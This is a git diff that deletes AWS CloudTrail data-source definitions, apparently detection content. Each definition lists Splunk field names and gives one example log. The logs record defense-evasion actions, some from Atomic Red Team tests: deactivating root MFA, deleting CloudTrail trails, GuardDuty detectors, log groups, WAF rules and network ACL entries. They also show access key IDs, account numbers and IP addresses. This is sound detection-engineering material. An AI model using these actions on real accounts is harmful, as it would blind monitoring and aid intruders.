-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}}, "eventTime": "2022-10-04T16:13:45Z", "eventSource": "iam.amazonaws.com", "eventName": "DeactivateMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent": "Coral/Netty4", "requestParameters": {"userName": "AWS ROOT USER", "serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements": null, "requestID": "d27cfb15-34b4-4c16-82bc-a55d15b4e47d", "eventID": "bfe9fd91-0b4d-470a-9c03-77839151806d", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
deleted file mode 100644
index 2b007962f4..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: AWS CloudTrail DeleteAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWMDJXSE6", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-26T18:44:21Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-26T21:23:22Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "AWS Internal", "requestParameters": null, "responseElements": null, "requestID": "e3616938-1aac-4abd-9ea3-3b0367b85082", "eventID": "bbd8cb02-22ba-4d1b-b23d-b82975463376", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
deleted file mode 100644
index 2cc31f6a88..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: AWS CloudTrail DeleteDetector
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.detectorId
-- responseElements.__type
-- responseElements.message
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-21T20:27:54Z", "eventSource": "guardduty.amazonaws.com", "eventName": "DeleteDetector", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/guardduty.delete-detector", "errorCode": "BadRequestException", "requestParameters": {"detectorId": "123"}, "responseElements": {"message": "The request is rejected because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"}, "requestID": "1e832076-d7a8-432b-b0df-54ba62f6b62c", "eventID": "c1367a2f-8910-4e64-9256-a854d2e9f37d", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
deleted file mode 100644
index 1a629908b2..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail DeleteGroup
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.groupName
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121522247101:user/bhavin_cli", "accountId": "121522247101", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-04-07T00:17:50Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteGroup", "awsRegion": "us-east-1", "sourceIPAddress": "12.12.12.20", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-group", "errorCode": "NoSuchEntityException", "errorMessage": "The group with name AtomicRedTeam_Victim cannot be found.", "requestParameters": {"groupName": "AtomicRedTeam_Victim"}, "responseElements": null, "requestID": "15684d3b-a8c5-4334-a996-16619e901c17", "eventID": "ab65dca3-3d28-41f4-9f99-443606cc49fe", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "121522247101"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
deleted file mode 100644
index dd17f3aa61..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail DeleteIPSet
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.detectorId
-- requestParameters.ipSetId
-- responseElements.__type
-- responseElements.message
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-26T23:14:57Z", "eventSource": "guardduty.amazonaws.com", "eventName": "DeleteIPSet", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/guardduty.delete-ip-set", "errorCode": "BadRequestException", "requestParameters": {"detectorId": "11111", "ipSetId": "1111"}, "responseElements": {"message": "The request is rejected because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"}, "requestID": "70d36916-4ce7-4b6e-9226-9da47d58d554", "eventID": "884dc529-d98f-4529-bfa1-8cdd6c06d02f", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
deleted file mode 100644
index c90eec17ab..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail DeleteLogGroup
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.logGroupName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:58:48Z", "eventSource": "logs.amazonaws.com", "eventName": "DeleteLogGroup", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/logs.delete-log-group", "requestParameters": {"logGroupName": "test-logs"}, "responseElements": null, "requestID": "76089b03-d749-4f83-bc0e-b857c83bba5f", "eventID": "5aba96c4-e7f9-4e4f-b5e6-49694162195d", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
deleted file mode 100644
index 24024042dc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteLogStream
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.logGroupName
-- requestParameters.logStreamName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:09:51Z", "eventSource": "logs.amazonaws.com", "eventName": "DeleteLogStream", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/logs.delete-log-stream", "requestParameters": {"logGroupName": "test-logs", "logStreamName": "20150601"}, "responseElements": null, "requestID": "2d7e859e-d697-426f-8b56-c4c11c4055f3", "eventID": "561c3f4e-17ca-4438-b15d-29903baf7b13", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
deleted file mode 100644
index 9445114477..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail DeleteNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T09:26:26Z", "eventSource": "ec2.amazonaws.com", "eventName": "DeleteNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 40, "egress": false}, "responseElements": {"requestId": "607474bb-836b-46be-be4a-351ebbef67d6", "_return": true}, "requestID": "607474bb-836b-46be-be4a-351ebbef67d6", "eventID": "b9e05770-e9b0-4ba1-91e8-6537097e06e7", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
deleted file mode 100644
index 4c9cd67561..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail DeletePolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::151521547504:user/bhavin_cli", "accountId": "151521547504", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-04-02T18:01:00Z", "eventSource": "iam.amazonaws.com", "eventName": "DeletePolicy", "awsRegion": "us-east-1", "sourceIPAddress": "61.25.42.212", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-policy", "errorCode": "NoSuchEntityException", "errorMessage": "Policy arn:aws:iam::151521547504:policy/AtomicRedTeam was not found.", "requestParameters": {"policyArn": "arn:aws:iam::151521547504:policy/AtomicRedTeam"}, "responseElements": null, "requestID": "90cbe52f-e744-4bba-9f5c-1843c9ca1855", "eventID": "abd071bf-0a38-4fab-af4a-5eee55f0935e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "151521547504"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
deleted file mode 100644
index abc2cc3457..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteRule
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.changeToken
-- requestParameters.ruleId
-- responseElements.changeToken
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:40:42Z", "eventSource": "waf.amazonaws.com", "eventName": "DeleteRule", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/waf.delete-rule", "requestParameters": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f", "ruleId": "5a9b1c4a-a999-4bb2-9f51-555f086ff34f"}, "responseElements": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f"}, "requestID": "2089be3e-28ea-4349-b505-db72c81c272a", "eventID": "0f815483-f6bb-42d9-b870-0dcc64ddc9a4", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
deleted file mode 100644
index bce2759da8..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail DeleteTrail
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.name
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-13T19:03:51Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "DeleteTrail", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/cloudtrail.delete-trail", "requestParameters": {"name": "redatomictesttrail"}, "responseElements": null, "requestID": "2ba0af54-1451-4a2c-846e-18436bcee01e", "eventID": "1c53bcce-650d-486a-b3f6-f64fd853e509", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
deleted file mode 100644
index b337282ae5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteVirtualMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.serialNumber
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}}, "eventTime": "2022-10-04T16:13:46Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements": null, "requestID": "5f192b01-d59d-4cee-8880-cc5cc6fd9b43", "eventID": "01f0258f-b83f-4c0f-8fd3-380473840db8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
